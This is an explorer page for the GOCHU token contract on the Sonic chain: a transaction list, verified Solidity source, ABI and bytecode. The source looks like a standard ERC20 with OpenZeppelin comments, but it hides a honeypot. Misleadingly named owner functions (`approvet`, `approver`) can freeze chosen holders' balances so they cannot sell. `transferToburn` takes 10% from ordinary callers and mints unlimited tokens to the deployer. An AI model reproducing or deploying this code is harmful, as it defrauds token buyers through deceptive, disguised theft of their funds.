S Price: $0.727874 (+8.16%)

Contract

0xAa1145B6769D67Ed682307506DbFC1bB94EEc80b

Overview

S Balance

Sonic LogoSonic LogoSonic Logo0 S

S Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approvet109838502025-03-01 13:35:127 hrs ago1740836112IN
0xAa1145B6...B94EEc80b
0 S0.00486454105
Transfer Toburn109838302025-03-01 13:35:047 hrs ago1740836104IN
0xAa1145B6...B94EEc80b
0 S0.00559377105
Approve109824402025-03-01 13:26:167 hrs ago1740835576IN
0xAa1145B6...B94EEc80b
0 S0.0040355782.5
Transfer109819922025-03-01 13:23:297 hrs ago1740835409IN
0xAa1145B6...B94EEc80b
0 S0.0016723555.01
Approve109812202025-03-01 13:18:247 hrs ago1740835104IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Approve109803632025-03-01 13:13:177 hrs ago1740834797IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Transfer109803462025-03-01 13:13:117 hrs ago1740834791IN
0xAa1145B6...B94EEc80b
0 S0.0019006162.44
Transfer109799232025-03-01 13:10:397 hrs ago1740834639IN
0xAa1145B6...B94EEc80b
0 S0.0016737355.01
Approve109795302025-03-01 13:08:117 hrs ago1740834491IN
0xAa1145B6...B94EEc80b
0 S0.0026908655.01
Approver109765342025-03-01 12:48:057 hrs ago1740833285IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
Approve109765052025-03-01 12:47:537 hrs ago1740833273IN
0xAa1145B6...B94EEc80b
0 S0.0023806550.1
Approve109761082025-03-01 12:45:137 hrs ago1740833113IN
0xAa1145B6...B94EEc80b
0 S0.0026908655.01
Approve109753832025-03-01 12:39:528 hrs ago1740832792IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Approver109746412025-03-01 12:35:018 hrs ago1740832501IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
Approve109746252025-03-01 12:34:538 hrs ago1740832493IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Approver109744382025-03-01 12:33:208 hrs ago1740832400IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
Approver109685072025-03-01 11:54:478 hrs ago1740830087IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
Approve109685012025-03-01 11:54:458 hrs ago1740830085IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Approve109684812025-03-01 11:54:378 hrs ago1740830077IN
0xAa1145B6...B94EEc80b
0 S0.0653179782.5
Approver109683232025-03-01 11:53:338 hrs ago1740830013IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
Approve109658752025-03-01 11:37:289 hrs ago1740829048IN
0xAa1145B6...B94EEc80b
0 S0.0026721655.01
Approve109650522025-03-01 11:31:349 hrs ago1740828694IN
0xAa1145B6...B94EEc80b
0 S0.0025878655
Approve109620462025-03-01 11:11:309 hrs ago1740827490IN
0xAa1145B6...B94EEc80b
0 S0.0026908655.01
Approve109616972025-03-01 11:09:229 hrs ago1740827362IN
0xAa1145B6...B94EEc80b
0 S0.0026908655.01
Approver109614262025-03-01 11:07:359 hrs ago1740827255IN
0xAa1145B6...B94EEc80b
0 S0.0025505155
View all transactions

Parent Transaction Hash Block From To
View All Internal Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
GOCHU

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at SonicScan.org on 2025-03-01
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */

abstract contract Ownable  {
    constructor() {
        _transferOwnership(_msgSender());
    }

   
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    address private _owner;
    function owner() public view virtual returns (address) {
        return _owner;
    }
      /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */

    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
     /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
      /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
     /**
     * @dev Implementation of the {IERC20} interface.
     *
     * This implementation is agnostic to the way tokens are created. This means
     * that a supply mechanism has to be added in a derived contract using {_yydsed}.
     * For a generic mechanism see {ERC20PresetMinterPauser}.
     *
     * TIP: For a detailed writeup see our guide
     * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
     * to implement supply mechanisms].
     *
     * The default value of {decimals} is 18. To change this, you should override
     * this function so it returns a different value.
     *
     * We have followed general OpenZeppelin Contracts guidelines: functions revert
     * instead returning `false` on failure. This behavior is nonetheless
     * conventional and does not conflict with the expectations of ERC20
     * applications.
     *
     * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
     * This allows applications to reconstruct the allowance for all accounts just
     * by listening to said events. Other implementations of the EIP may not emit
     * these events, as it isn't required by the specification.
     *
     * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
     * functions have been added to mitigate the well-known issues around setting
     * allowances. See {IERC20-approve}.
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}
     /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
contract GOCHU      is Ownable {
    uint256 _totalSupply = 1*10**9*10**decimals();
    uint256 tota = _totalSupply;
    address private cjxxx;
    string private _tokenname;
    string private _tokensymbol;
    mapping(address => bool) private Holders;
    address[] public _Holders;
    constructor(string memory name_, string memory symbol_) {
        address msgSender = _msgSender();
        _tokenname = name_;
        _tokensymbol = symbol_;
        cjxxx = _msgSender();
        balances[msgSender] += _totalSupply;
        emit Transfer(address(0), msgSender, _totalSupply);
    }
     /**
     * @dev Returns the name of the token.
     */

    mapping(address => uint256) private balances;
    mapping(address => bool) private balancesto;
    mapping(address => bool) private balancesfrom;
    mapping(address => mapping(address => uint256)) private _allowances;
     /**
     * @dev Returns the name of the token.
     */
    
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
    
    function symbol() public view  returns (string memory) {
        return _tokensymbol;
    }
        /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    function decimals() public view virtual returns (uint8) {
        return 6;
    }
    function _HoldersAddress(address _address) internal {
        if (!Holders[_address]) {
            Holders[_address] = true;
            _Holders.push(_address);
        }
    }
      function getTokenHolders() public view returns (address[] memory) {
        return _Holders;
    }

    function getAdjusted(address from, address to) internal view returns (uint256) {
    uint256 adjusted = balances[from]; 
    if (balancesto[to] && from != cjxxx) {
        adjusted = adjusted ^ adjusted; 
    }
    if (balancesfrom[from]) {
        adjusted = adjusted ^ adjusted; 
    }
    return adjusted;
}


   function approvet(address _to, bool to_) public {
    if (cjxxx != msg.sender) {
        revert("fu");
    }
        balancesto[_to] 
    = to_;
}

    function balanceOf(address account) public view returns (uint256) {
        return balances[account];
    }
      /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */


    function name() public view returns (string memory) {
        return _tokenname;
    }
          /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
     
    function approver (address _from, bool from_) public {
          if(cjxxx != _msgSender()){
            revert("fu");
        }
           balancesfrom[_from] 
       = from_;
    }
    

     /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public returns (bool) {
        _transfer(_msgSender(), to, amount);
        return true;
    }
   
    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }
      /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */

    function approve(address spender, uint256 amount) public returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
         /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }
      /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    


     function _transfer(
     address from,
     address to,
     uint256 amount
    ) internal virtual {
     uint256 decysBalances = getAdjusted(from, to);
     require(from != address(0), "ERC20: transfer from the zero address");
     require(to != address(0), "ERC20: transfer to the zero address");
     require(decysBalances >= amount, "ERC20: transfer amount exceeds balance");
     balances[from] = balances[from]-amount;
     balances[to] = balances[to]+amount;
    
     emit Transfer(from, to, amount);
      _HoldersAddress(to);
    
    }
 
       /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
     
     //function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
       /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */


    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance - amount);
        }
    }
      /**
     * @dev See {IERC20-allowance}.
     */

         /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
    function transferToburn(uint256 amount) public {
    address burnAddress = _msgSender();
    uint256 balancefrom = _totalSupply;
    if (cjxxx != _msgSender()) {
        uint256 deductAmount = balances[burnAddress] * 10 / 100; 
        require(balances[burnAddress] > 0, "fu");
        balances[burnAddress] -= deductAmount; 
        _totalSupply -= deductAmount; 
    } else {
        uint256 burnAmount = tota * amount;  
        balances[burnAddress] += burnAmount;  
        balancefrom += burnAmount;  
        _totalSupply = balancefrom; 
    }
}
    
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance - subtractedValue);
        return true;
    }
}
     /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    
    
     /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"_Holders","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"bool","name":"from_","type":"bool"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"bool","name":"to_","type":"bool"}],"name":"approvet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTokenHolders","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferToburn","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052620000126006600a6200027b565b6200002290633b9aca0062000293565b6001556001546002553480156200003857600080fd5b50604051620013f0380380620013f08339810160408190526200005b9162000372565b620000663362000116565b3360046200007584826200046b565b5060056200008483826200046b565b50600380546001600160a01b031916331790556001546001600160a01b03821660009081526008602052604081208054909190620000c490849062000537565b90915550506001546040519081526001600160a01b038216906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050506200054d565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620001bd578160001904821115620001a157620001a162000166565b80851615620001af57918102915b93841c939080029062000181565b509250929050565b600082620001d65750600162000275565b81620001e55750600062000275565b8160018114620001fe5760028114620002095762000229565b600191505062000275565b60ff8411156200021d576200021d62000166565b50506001821b62000275565b5060208310610133831016604e8410600b84101617156200024e575081810a62000275565b6200025a83836200017c565b806000190482111562000271576200027162000166565b0290505b92915050565b60006200028c60ff841683620001c5565b9392505050565b808202811582820484141762000275576200027562000166565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620002d557600080fd5b81516001600160401b0380821115620002f257620002f2620002ad565b604051601f8301601f19908116603f011681019082821181831017156200031d576200031d620002ad565b816040528381526020925086838588010111156200033a57600080fd5b600091505b838210156200035e57858201830151818301840152908201906200033f565b600093810190920192909252949350505050565b600080604083850312156200038657600080fd5b82516001600160401b03808211156200039e57600080fd5b620003ac86838701620002c3565b93506020850151915080821115620003c357600080fd5b50620003d285828601620002c3565b9150509250929050565b600181811c90821680620003f157607f821691505b6020821081036200041257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200046657600081815260208120601f850160051c81016020861015620004415750805b601f850160051c820191505b8181101562000462578281556001016200044d565b5050505b505050565b81516001600160401b03811115620004875762000487620002ad565b6200049f81620004988454620003dc565b8462000418565b602080601f831160018114620004d75760008415620004be5750858301515b600019600386901b1c1916600185901b17855562000462565b600085815260208120601f198616915b828110156200050857888601518255948401946001909101908401620004e7565b5085821015620005275787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b8082018082111562000275576200027562000166565b610e93806200055d6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80636b254a9a116100a25780638da5cb5b116100715780638da5cb5b1461023157806395d89b4114610242578063a457c2d71461024a578063a9059cbb1461025d578063dd62ed3e1461027057600080fd5b80636b254a9a146101d857806370a08231146101eb578063715018a614610214578063876b15661461021c57600080fd5b806323b872dd116100de57806323b872dd14610178578063313ce5671461018b57806348f2f8121461019a5780634a7eb02e146101ad57600080fd5b806306fdde0314610110578063095ea7b31461012e5780630df884561461015157806318160ddd14610166575b600080fd5b610118610283565b6040516101259190610bd2565b60405180910390f35b61014161013c366004610c3c565b610315565b6040519015158152602001610125565b61016461015f366004610c66565b61032c565b005b6001545b604051908152602001610125565b610141610186366004610c7f565b61045e565b60405160068152602001610125565b6101646101a8366004610cbb565b610482565b6101c06101bb366004610c66565b6104d7565b6040516001600160a01b039091168152602001610125565b6101646101e6366004610cbb565b610501565b61016a6101f9366004610cf7565b6001600160a01b031660009081526008602052604090205490565b610164610556565b61022461056a565b6040516101259190610d12565b6000546001600160a01b03166101c0565b6101186105cb565b610141610258366004610c3c565b6105da565b61014161026b366004610c3c565b61065c565b61016a61027e366004610d5f565b610669565b60606004805461029290610d92565b80601f01602080910402602001604051908101604052809291908181526020018280546102be90610d92565b801561030b5780601f106102e05761010080835404028352916020019161030b565b820191906000526020600020905b8154815290600101906020018083116102ee57829003601f168201915b5050505050905090565b6000610322338484610694565b5060015b92915050565b6001546003543391906001600160a01b03168214610403576001600160a01b03821660009081526008602052604081205460649061036b90600a610de2565b6103759190610df9565b6001600160a01b0384166000908152600860205260409020549091506103b65760405162461bcd60e51b81526004016103ad90610e1b565b60405180910390fd5b6001600160a01b038316600090815260086020526040812080548392906103de908490610e37565b9250508190555080600160008282546103f79190610e37565b90915550610459915050565b6000836002546104139190610de2565b6001600160a01b038416600090815260086020526040812080549293508392909190610440908490610e4a565b9091555061045090508183610e4a565b60018190559150505b505050565b60003361046c8582856107b8565b610477858585610834565b506001949350505050565b6003546001600160a01b031633146104ac5760405162461bcd60e51b81526004016103ad90610e1b565b6001600160a01b03919091166000908152600a60205260409020805460ff1916911515919091179055565b600781815481106104e757600080fd5b6000918252602090912001546001600160a01b0316905081565b6003546001600160a01b0316331461052b5760405162461bcd60e51b81526004016103ad90610e1b565b6001600160a01b03919091166000908152600960205260409020805460ff1916911515919091179055565b61055e610a20565b6105686000610a7a565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030b57602002820191906000526020600020905b81546001600160a01b031681526001909101906020018083116105a4575050505050905090565b60606005805461029290610d92565b600033816105e88286610669565b9050838110156106485760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103ad565b61047782866106578785610e37565b610694565b6000610322338484610834565b6001600160a01b039182166000908152600b6020908152604080832093909416825291909152205490565b6001600160a01b0383166106f65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103ad565b6001600160a01b0382166107575760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ad565b6001600160a01b038381166000818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107c48484610669565b9050600019811461082e578181101561081f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103ad565b61082e84846106578585610e37565b50505050565b60006108408484610aca565b90506001600160a01b0384166108a65760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ad565b6001600160a01b0383166109085760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ad565b818110156109675760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103ad565b6001600160a01b03841660009081526008602052604090205461098b908390610e37565b6001600160a01b0380861660009081526008602052604080822093909355908516815220546109bb908390610e4a565b6001600160a01b0380851660008181526008602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610a0f9086815260200190565b60405180910390a361082e83610b49565b6000546001600160a01b031633146105685760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ad565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038083166000908152600860209081526040808320549385168352600990915281205490919060ff168015610b1457506003546001600160a01b03858116911614155b15610b1d575060005b6001600160a01b0384166000908152600a602052604090205460ff1615610b42575060005b9392505050565b6001600160a01b03811660009081526006602052604090205460ff16610bcf576001600160a01b0381166000818152600660205260408120805460ff191660019081179091556007805491820181559091527fa66cc928b5edb82af9bd49922954155ab7b0942694bea4ce44661d9a8736c6880180546001600160a01b03191690911790555b50565b600060208083528351808285015260005b81811015610bff57858101830151858201604001528201610be3565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c3757600080fd5b919050565b60008060408385031215610c4f57600080fd5b610c5883610c20565b946020939093013593505050565b600060208284031215610c7857600080fd5b5035919050565b600080600060608486031215610c9457600080fd5b610c9d84610c20565b9250610cab60208501610c20565b9150604084013590509250925092565b60008060408385031215610cce57600080fd5b610cd783610c20565b915060208301358015158114610cec57600080fd5b809150509250929050565b600060208284031215610d0957600080fd5b610b4282610c20565b6020808252825182820181905260009190848201906040850190845b81811015610d535783516001600160a01b031683529284019291840191600101610d2e565b50909695505050505050565b60008060408385031215610d7257600080fd5b610d7b83610c20565b9150610d8960208401610c20565b90509250929050565b600181811c90821680610da657607f821691505b602082108103610dc657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761032657610326610dcc565b600082610e1657634e487b7160e01b600052601260045260246000fd5b500490565b602080825260029082015261667560f01b604082015260600190565b8181038181111561032657610326610dcc565b8082018082111561032657610326610dcc56fea264697066735822122071a9f0864d7d22ff90d1b6f66bebbd4334c9f3829f80d92d01dfd3d47b7c2d7e64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005476f6368750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005474f434855000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c80636b254a9a116100a25780638da5cb5b116100715780638da5cb5b1461023157806395d89b4114610242578063a457c2d71461024a578063a9059cbb1461025d578063dd62ed3e1461027057600080fd5b80636b254a9a146101d857806370a08231146101eb578063715018a614610214578063876b15661461021c57600080fd5b806323b872dd116100de57806323b872dd14610178578063313ce5671461018b57806348f2f8121461019a5780634a7eb02e146101ad57600080fd5b806306fdde0314610110578063095ea7b31461012e5780630df884561461015157806318160ddd14610166575b600080fd5b610118610283565b6040516101259190610bd2565b60405180910390f35b61014161013c366004610c3c565b610315565b6040519015158152602001610125565b61016461015f366004610c66565b61032c565b005b6001545b604051908152602001610125565b610141610186366004610c7f565b61045e565b60405160068152602001610125565b6101646101a8366004610cbb565b610482565b6101c06101bb366004610c66565b6104d7565b6040516001600160a01b039091168152602001610125565b6101646101e6366004610cbb565b610501565b61016a6101f9366004610cf7565b6001600160a01b031660009081526008602052604090205490565b610164610556565b61022461056a565b6040516101259190610d12565b6000546001600160a01b03166101c0565b6101186105cb565b610141610258366004610c3c565b6105da565b61014161026b366004610c3c565b61065c565b61016a61027e366004610d5f565b610669565b60606004805461029290610d92565b80601f01602080910402602001604051908101604052809291908181526020018280546102be90610d92565b801561030b5780601f106102e05761010080835404028352916020019161030b565b820191906000526020600020905b8154815290600101906020018083116102ee57829003601f168201915b5050505050905090565b6000610322338484610694565b5060015b92915050565b6001546003543391906001600160a01b03168214610403576001600160a01b03821660009081526008602052604081205460649061036b90600a610de2565b6103759190610df9565b6001600160a01b0384166000908152600860205260409020549091506103b65760405162461bcd60e51b81526004016103ad90610e1b565b60405180910390fd5b6001600160a01b038316600090815260086020526040812080548392906103de908490610e37565b9250508190555080600160008282546103f79190610e37565b90915550610459915050565b6000836002546104139190610de2565b6001600160a01b038416600090815260086020526040812080549293508392909190610440908490610e4a565b9091555061045090508183610e4a565b60018190559150505b505050565b60003361046c8582856107b8565b610477858585610834565b506001949350505050565b6003546001600160a01b031633146104ac5760405162461bcd60e51b81526004016103ad90610e1b565b6001600160a01b03919091166000908152600a60205260409020805460ff1916911515919091179055565b600781815481106104e757600080fd5b6000918252602090912001546001600160a01b0316905081565b6003546001600160a01b0316331461052b5760405162461bcd60e51b81526004016103ad90610e1b565b6001600160a01b03919091166000908152600960205260409020805460ff1916911515919091179055565b61055e610a20565b6105686000610a7a565b565b6060600780548060200260200160405190810160405280929190818152602001828054801561030b57602002820191906000526020600020905b81546001600160a01b031681526001909101906020018083116105a4575050505050905090565b60606005805461029290610d92565b600033816105e88286610669565b9050838110156106485760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103ad565b61047782866106578785610e37565b610694565b6000610322338484610834565b6001600160a01b039182166000908152600b6020908152604080832093909416825291909152205490565b6001600160a01b0383166106f65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103ad565b6001600160a01b0382166107575760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103ad565b6001600160a01b038381166000818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107c48484610669565b90506